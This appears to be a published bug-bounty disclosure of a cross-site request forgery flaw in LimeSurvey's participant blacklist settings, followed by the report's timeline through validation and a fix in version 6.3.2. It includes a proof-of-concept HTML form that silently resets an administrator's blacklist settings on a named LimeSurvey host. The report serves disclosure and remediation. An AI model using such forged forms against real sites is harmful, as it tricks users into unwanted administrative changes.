CSRF edit Blacklist settings( YES to NO) in limesurvey/limesurvey


Reported on

Sep 30th 2023


CSRF edit Blacklist settings

Proof of Concept

1 .For example, the data fields in the Blacklist settings are all set to: YES.

2 .The attacker sends a fake form to the user:

    <form action="https://haido456.limesurvey.net/admin/participants/sa/storeBlacklistValues">
      <input type="hidden" name="YII&#95;CSRF&#95;TOKEN" value="" />
      <input type="hidden" name="blacklistallsurveys" value="0" />
      <input type="hidden" name="blacklistnewsurveys" value="0" />
      <input type="hidden" name="blockaddingtosurveys" value="0" />
      <input type="hidden" name="hideblacklisted" value="0" />
      <input type="hidden" name="deleteblacklisted" value="0" />
      <input type="hidden" name="allowunblacklist" value="0" />
      <input type="hidden" name="yt0" value="Save" />
      <input type="submit" value="Submit request" />
      history.pushState('', '', '/');

3 .User Clicked, changed the setting to NO, which the user did not want

Payload Poc


Video Poc



Trick users into taking unwanted actions.

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago
HaiNguyen modified the report
5 months ago
We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago
5 months ago


Hi, any new update ?

5 months ago


any new update ?

5 months ago

Internal tracking number: 19165

tiborpacalat validated this vulnerability 4 months ago
hainguyen0207 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
tiborpacalat marked this as fixed in 6.3.2+231031 with commit 238c39 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation